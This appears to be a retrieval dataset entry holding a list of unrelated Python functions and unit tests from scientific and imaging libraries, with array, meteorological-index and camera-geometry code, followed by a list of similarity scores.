"def at_loc((x, y), (cx, cy), eps=0.000035):\n\treturn (x - cx)**2 + (y - cy)**2 <= eps**2", "def activated_pixels_fitness(p, e):\n shape = (max(p.shape[0], e.shape[0]), max(p.shape[1], e.shape[1]))\n diff = np.zeros(shape, dtype=int)\n diff[0:p.shape[0], 0:p.shape[1]] = (p > 0).astype(int)\n diff[0:e.shape[0], 0:e.shape[1]] -= (e > 0).astype(int)\n\n return (diff != 0).sum()", "def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))", "def advance(self):\n count = [[0 for col in range(self.width+2)] for row in range(self.height+2)]\n for y in range(1, self.height+1):\n for x in range(1, self.width+1):\n if self.array[y][x]:\n count[y][x-1] += 1\n count[y][x+1] += 1\n count[y-1][x-1] += 1\n count[y-1][x] += 1\n count[y-1][x+1] += 1\n count[y+1][x-1] += 1\n count[y+1][x] += 1\n count[y+1][x+1] += 1\n for y in range(1, self.height+1):\n for x in range(1, self.width+1):\n if count[y][x] == 3:\n self.array[y][x] = 1\n elif count[y][x] == 2 and self.array[y][x]:\n self.array[y][x] = 1\n else:\n self.array[y][x] = 0\n self.array[1][1] = 1\n self.array[1][self.width] = 1\n self.array[self.height][self.width] = 1\n self.array[self.height][1] = 1", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_local_useless_inc_subtensor_no_opt():\n x = matrix(\"x\")\n y = matrix(\"y\")\n\n s = x[:, ::2]\n o_shape = set_subtensor(s, specify_shape(y, s.shape))\n\n mode = get_default_mode().including(\"local_useless_inc_subtensor\")\n f_shape = function([x, y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)\n\n out = f_shape([[2, 3, 6, 7]], [[8, 9]])\n assert np.array_equal(out, np.asarray([[8, 3, 9, 7]]))\n\n # This is an increment with a non-constant target array\n s = x[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n f_shape = function([x, y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)\n\n # This is an increment with a non-zero target array\n s = at.ones((2, 2))[:, :]\n o_shape = inc_subtensor(s, specify_shape(y, s.shape))\n\n f_shape = function([y], o_shape, mode=mode)\n\n topo = f_shape.maker.fgraph.toposort()\n assert any(isinstance(n.op, IncSubtensor) for n in topo)", "def test_sweat_index():\n pressure = np.array([1008., 1000., 947., 925., 921., 896., 891., 889., 866.,\n 858., 850., 835., 820., 803., 733., 730., 700., 645.,\n 579., 500., 494., 466., 455., 441., 433., 410., 409.,\n 402., 400., 390., 388., 384., 381., 349., 330., 320.,\n 306., 300., 278., 273., 250., 243., 208., 200., 196.,\n 190., 179., 159., 151., 150., 139.]) * units.hPa\n temperature = np.array([27.4, 26.4, 22.9, 21.4, 21.2, 20.7, 20.6, 21.2, 19.4,\n 19.1, 18.8, 17.8, 17.4, 16.3, 11.4, 11.2, 10.2, 6.1,\n 0.6, -4.9, -5.5, -8.5, -9.9, -11.7, -12.3, -13.7, -13.8,\n -14.9, -14.9, -16.1, -16.1, -16.9, 
-17.3, -21.7, -24.5, -26.1,\n -28.3, -29.5, -33.1, -34.2, -39.3, -41., -50.2, -52.5, -53.5,\n -55.2, -58.6, -65.2, -68.1, -68.5, -72.5]) * units.degC\n dewpoint = np.array([24.9, 24.6, 22., 20.9, 20.7, 14.8, 13.6, 12.2, 16.8,\n 16.6, 16.5, 15.9, 13.6, 13.2, 11.3, 11.2, 8.6, 4.5,\n -0.8, -8.1, -9.5, -12.7, -12.7, -12.8, -13.1, -24.7, -24.4,\n -21.9, -24.9, -36.1, -31.1, -26.9, -27.4, -33., -36.5, -47.1,\n -31.4, -33.5, -40.1, -40.8, -44.1, -45.6, -54., -56.1, -56.9,\n -58.6, -61.9, -68.4, -71.2, -71.6, -77.2]) * units.degC\n speed = np.array([0., 3., 10., 12., 12., 14., 14., 14., 12.,\n 12., 12., 12., 11., 11., 12., 12., 10., 10.,\n 8., 5., 4., 1., 0., 3., 5., 10., 10.,\n 11., 11., 13., 14., 14., 15., 23., 23., 24.,\n 24., 24., 26., 27., 28., 30., 25., 24., 26.,\n 28., 33., 29., 32., 26., 26.]) * units.knot\n direction = np.array([0., 170., 200., 205., 204., 200., 197., 195., 180.,\n 175., 175., 178., 181., 185., 160., 160., 165., 165.,\n 203., 255., 268., 333., 0., 25., 40., 83., 85.,\n 89., 90., 100., 103., 107., 110., 90., 88., 87.,\n 86., 85., 85., 85., 60., 55., 60., 50., 46.,\n 40., 45., 35., 50., 50., 50.]) * units.degree\n\n sweat = sweat_index(pressure, temperature, dewpoint, speed, direction)\n assert_almost_equal(sweat, 227., 2)", "def numZeroesAround(imgArray, (x, y)):\n\tnum = 0\n\tfor x_r in range(-1, 2):\n\t\tfor y_r in range(-1, 2):\n\t\t\tif x_r != 0 or y_r != 0:\n\t\t\t\tif imgArray[x + x_r][y + y_r] == (0, 0, 0, 255):\n\t\t\t\t\tnum += 1\n\n\treturn num", "def test_synth_positions_small_width():\n background = Image.new('RGB', (20, 20))\n patch_1 = Image.new('RGB', (10, 20))\n patch_2 = Image.new('RGB', (11, 20))\n\n parameters = {'data': [background, patch_1, patch_2]}\n\n positions = images.synth_positions(parameters)", "def test06(self):\n a = np.arange(1, 11) > 5\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()[2:4]\n cwt = [i for i in b.wheretrue(skip=2, limit=2)]\n # print \"numpy ->\", a.nonzero()[0].tolist()[2:4]\n # print \"where ->\", [i for i in b.wheretrue(limit=2,skip=2)]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def test_lifted_index_xarray(index_xarray_data):\n result = lifted_index(index_xarray_data.isobaric, index_xarray_data.temperature,\n index_xarray_data.profile)\n assert_array_almost_equal(result, np.full((1, 1, 2, 3), 7) * units.delta_degC)", "def test_pad():\n x = randtool(\"float\", -10, 10, [3, 2, 1, 2])\n pad = [1, 1, 2, 3]\n mode = \"constant\"\n value = 2.0\n data_format = \"NCHW\"\n res = np.array(\n [\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -8.88523461, 1.99072967, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 4.45995261, 9.40579439, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n ],\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 6.43138915, 0.55102135, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -3.37046541, -2.92035609, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n ],\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -8.41939397, 1.11828761, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -6.68411074, -4.09524338, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 
2.0],\n ],\n ],\n ]\n )\n obj.run(res=res, x=x, pad=pad, mode=mode, value=value, data_format=data_format)", "def test02(self):\n a = np.arange(1, 1e5) < 0\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()\n cwt = [i for i in b.wheretrue()]\n # print \"numpy ->\", a.nonzero()[0].tolist()\n # print \"where ->\", [i for i in b.wheretrue()]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def test_compute_pixel_rays() -> None:\n u = 12\n v = 2\n img_w = 20\n img_h = 10\n fx = 10\n fy = 10\n\n ray_dir = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n\n gt_ray_dir: NDArrayFloat = np.array([2.0, -3.0, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n assert np.allclose(gt_ray_dir, ray_dir)", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def phantom_squares(n_points,S):\n \n #Rescaling according to image size \n S[:,0] = S[:,0]*n_points/2\n S[:,1] = S[:,1]*n_points/2\n S[:,2] = S[:,2]*n_points/2\n S[:,3] = S[:,3]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 ) \n nrow,ncol = S.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow)) \n\n for k in range(nrow): #itero sui quadrati\n x_new = x - S[k,0]\n y_new = y - S[k,1]\n\n u = abs(x_new*math.cos(S[k,3])+y_new*math.sin(S[k,3]))\n v = abs(-x_new*math.sin(S[k,3])+y_new*math.cos(S[k,3]))\n\n cond = np.maximum(u,v)\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (cond[i,j] < S[k,2]/2):\n phantom1[i,j,k] = S[k,4]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def test_dxt5_colorblock_alpha_issue_4142():\n\n with Image.open(\"Tests/images/dxt5-colorblock-alpha-issue-4142.dds\") as im:\n px = im.getpixel((0, 0))\n assert px[0] != 0\n assert px[1] != 0\n assert px[2] != 0\n\n px = im.getpixel((1, 0))\n assert px[0] != 0\n assert px[1] != 0\n assert px[2] != 0", "def test01(self):\n a = np.arange(1, 11) < 0\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()\n cwt = [i for i in b.wheretrue()]\n # print \"numpy ->\", a.nonzero()[0].tolist()\n # print \"where ->\", [i for i in b.wheretrue()]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def shifts_projection(sc, clean):\n def shifts_projected(clean, axis):\n projected = clean.map(lambda x: x.mean(axis=axis)[:, :, np.newaxis])\n target = getTarget(projected, 30, 1)\n shifts = registerByPlane(sc, projected, target[:, :, np.newaxis], 10, False)\n return shifts[:, :, 0]\n\n # shifts_xy = shifts_projected(clean, 2)\n shifts_xz = shifts_projected(clean, 1)\n shifts_yz = shifts_projected(clean, 0)\n\n # x_shifts = np.mean(np.stack((shifts_xz[:, 0], shifts_xy[:, 0])), axis=0)\n z_shifts = np.mean(np.stack((shifts_xz[:, 1], shifts_yz[:, 1])), axis=0)\n # y_shifts = np.mean(np.stack((shifts_yz[:, 0], shifts_xy[:, 1])), axis=0)\n plt.figure()\n plt.plot(shifts_xz[:, 1])\n plt.plot(shifts_yz[:, 1])\n plt.plot(z_shifts)\n plt.title('Z')\n # plt.figure()\n # plt.plot(shifts_xz[:, 0])\n # plt.plot(shifts_xy[:, 0])\n # plt.plot(x_shifts)\n # plt.title('X')\n # plt.figure()\n # plt.plot(shifts_yz[:, 0])\n # plt.plot(shifts_xy[:, 1])\n # plt.plot(y_shifts)\n # 
plt.title('Y')\n # shifts_all = np.stack((x_shifts, y_shifts, z_shifts))\n\n def initReg(kv):\n from scipy.ndimage.interpolation import shift\n index, volume = kv\n current_shift = (0, 0, -1 * z_shifts[int(index[0])])\n shifted = shift(volume, current_shift)\n return shifted.astype(np.int16)\n\n reg = clean.map(initReg, with_keys=True, value_shape=clean.shape[1:], dtype=np.int16)\n reg.cache()\n reg.count()\n return reg", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_increment(self):\r\n self.p + 1\r\n self.assertEqual(str(self.p), '1% [....................]')\r\n self.p + 4\r\n self.assertEqual(str(self.p), '5% [#...................]')", "def test_prealloc_passthrough(op):\n x1 = np.arange(10)\n x2 = np.arange(10)\n scratch_space = np.zeros(x1.shape)\n _helper_prealloc_passthrough(op, x1, x2, scratch_space)", "def s_pos(self):\n running_total = 0\n for i in range(self.prob.num):\n if self.alphas[i] > 1e-5 > self.prob.C - self.deltas[i] and self.prob.Y[i] == 1:\n ayxx = 0\n for j in range(self.prob.num):\n ayxx += self.alphas[j] * self.prob.Y[j] * self.prob.xkernel(self.prob.X[j], self.prob.X[i])\n running_total += 1 - ayxx\n return running_total", "def test_add_op_jit():\n x = np.array([1, 2, 3, 4, 5, 6, 7])\n paddle_x = paddle.to_tensor(x).astype(\"float32\")\n paddle_x.stop_gradient = False\n print(paddle_x)\n a = 1\n b = 5\n out = custom_ops.slice_test(paddle_x, a, b)\n print(\"out: \", out)\n print(\"numpy out: \", x[a:b])\n assert np.allclose(out.numpy(), x[a:b])\n print(\"run success\")", "def test00(self):\n a = np.arange(1, 111)\n b = bcolz.carray(a)\n c = b[[3, 1]]\n r = a[[3, 1]]\n assert_array_equal(c, r, \"fancy indexing does not work correctly\")", "def test05(self):\n a = np.arange(1, 11) > 5\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()[2:]\n cwt = [i for i in b.wheretrue(skip=2)]\n # print \"numpy ->\", a.nonzero()[0].tolist()[2:]\n # print \"where ->\", [i for i in b.wheretrue(skip=2)]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def centered_stencil(self):\n\n # compute the shape of the new stencil\n shp = self.arr.shape\n shp = tuple(max(i, j-(i+1))*2 + 1 for i, j in zip(self.center, shp))\n # print(\"New Shape :\", shp)\n # generate the stencil in the right shape\n S = np.zeros(shp)\n # embed the stencil into the bigger stencil in order to place the center\n # into the center\n slc = []\n for c, shp_arr, shp_s in zip(self.center, self.arr.shape, shp):\n if c < shp_arr/2:\n slc.append(slice(shp_s - shp_arr, None))\n else:\n slc.append(slice(0, -(shp_s - shp_arr)))\n\n # print(slc)\n S[slc] = self.arr[:]\n # print(\"The Stencil\")\n # print(self.arr)\n # print(\"Centered stencil\")\n # print(S)\n return S", "def sample_func(sample_point):\r\n if sample_point[0] < 0 \\\r\n or sample_point[1] < 0 \\\r\n or sample_point[0] >= image.width \\\r\n or sample_point[1] >= 
image.height:\r\n return 0\r\n\r\n point_tuple = sample_point[0], sample_point[1]\r\n color = image.getpixel(point_tuple)\r\n if color[3] > 0:\r\n return 255\r\n else:\r\n return 0", "def __stars__(self):\n t_ops = self.__ops__[1::2]\n return t_ops.count('x') + t_ops.count('X')", "def test_adjacent_bomb_count(self):\n index = 0\n adj_list = utils.adjacent_bomb_count(index)\n adj_list_2 = [\n index + x\n for x in utils.LEFT_ADJ_LIST\n if 0 <= index + x <= (utils.TILE_COUNT - 1)\n ]\n self.assertEqual(adj_list, adj_list_2)", "def test_generate_frustum_planes_stereo() -> None:\n near_clip_dist = 3.56 # arbitrary value\n\n # Set \"focal_length_x_px_\"\n fx_px = 3666.534329132812\n\n # Set \"focal_length_y_px_\"\n fy_px = 3673.5030423482513\n\n # Set \"focal_center_x_px_\"\n cx_px = 1235.0158218941356\n\n # Set \"focal_center_y_px_\"\n cy_px = 1008.4536901420888\n\n camera_name = \"stereo_front_left\"\n height_px = 1550\n width_px = 2048\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx_px,\n fy_px=fy_px,\n cx_px=cx_px,\n cy_px=cy_px,\n height_px=height_px,\n width_px=width_px,\n cam_name=camera_name,\n )\n (\n left_plane,\n right_plane,\n near_plane,\n bottom_plane,\n top_plane,\n ) = pinhole_camera.frustum_planes(near_clip_dist)\n\n left_plane_expected: NDArrayFloat = np.array([fx_px, 0.0, width_px / 2.0, 0.0])\n right_plane_expected: NDArrayFloat = np.array([-fx_px, 0.0, width_px / 2.0, 0.0])\n near_plane_expected: NDArrayFloat = np.array([0.0, 0.0, 1.0, -near_clip_dist])\n bottom_plane_expected: NDArrayFloat = np.array([0.0, -fx_px, height_px / 2.0, 0.0])\n top_plane_expected: NDArrayFloat = np.array([0.0, fx_px, height_px / 2.0, 0.0])\n\n assert np.allclose(\n left_plane, left_plane_expected / np.linalg.norm(left_plane_expected)\n )\n assert np.allclose(\n right_plane, right_plane_expected / np.linalg.norm(right_plane_expected)\n )\n assert np.allclose(\n bottom_plane, bottom_plane_expected / np.linalg.norm(bottom_plane_expected)\n )\n assert np.allclose(\n top_plane, top_plane_expected / np.linalg.norm(top_plane_expected)\n )\n assert np.allclose(near_plane, near_plane_expected)" ]
[ "0.65050405", "0.54784226", "0.5474315", "0.5348384", "0.5347258", "0.5336783", "0.53343135", "0.53305495", "0.5314463", "0.52894896", "0.5283575", "0.5209135", "0.52068275", "0.5183291", "0.5156076", "0.5149829", "0.51383203", "0.51378614", "0.5116575", "0.51146805", "0.51082945", "0.5099656", "0.5092038", "0.5088668", "0.5084702", "0.5072374", "0.50645643", "0.5061528", "0.50502956", "0.5042427", "0.5034169", "0.50210094", "0.5002765", "0.49875385", "0.49859145", "0.49761724", "0.4971969", "0.49693465", "0.49691996", "0.4967546", "0.4965084", "0.49438098", "0.49350983", "0.4931023", "0.49299264", "0.4916141", "0.49120057", "0.49014682", "0.48948708", "0.48859465", "0.48735583", "0.48633936", "0.48567978", "0.48540846", "0.48412153", "0.48392224", "0.48296118", "0.48262948", "0.48000902", "0.47965497", "0.47948715", "0.4791709", "0.47852236", "0.47742406", "0.4773899", "0.47715682", "0.4765449", "0.47601563", "0.475863", "0.47546595", "0.47457623", "0.47377515", "0.47374162", "0.47350913", "0.47307986", "0.4727548", "0.4726233", "0.47205812", "0.47042418", "0.47039127", "0.4701436", "0.468695", "0.46859375", "0.46818143", "0.46772042", "0.46770996", "0.4667685", "0.4665822", "0.46654156", "0.46643534", "0.46599415", "0.46587986", "0.4658344", "0.46571508", "0.46565595", "0.46549633", "0.46525267", "0.4651183", "0.46509942", "0.46493447", "0.46487588" ]
0.0
-1
Test pointwise arithmetic with stencil offsets across two functions in indexed expression format
def test_indexed_stencil(self, expr, result):
    j, l = dimify('j l')
    a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base
    fa = a.function
    b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base
    fb = b.function
    eqn = eval(expr)
    Operator(eqn)(fa, fb)
    assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def position_op(x, wfunc):\n return x*wfunc", "def test_indexed_buffered(self, expr, result):\n i, j, l = dimify('i j l')\n a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base\n fa = a.function\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_indexed_open_loops(self, expr, result):\n i, j, l = dimify('i j l')\n pushed = [d.size for d in [j, l]]\n j.size = None\n l.size = None\n a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed\n fa = a.function\n fa.data[0, :, :] = 2.\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)\n j.size, l.size = pushed", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 
1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n statname,t,probs)\r\n return\r\n return t, probs", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 
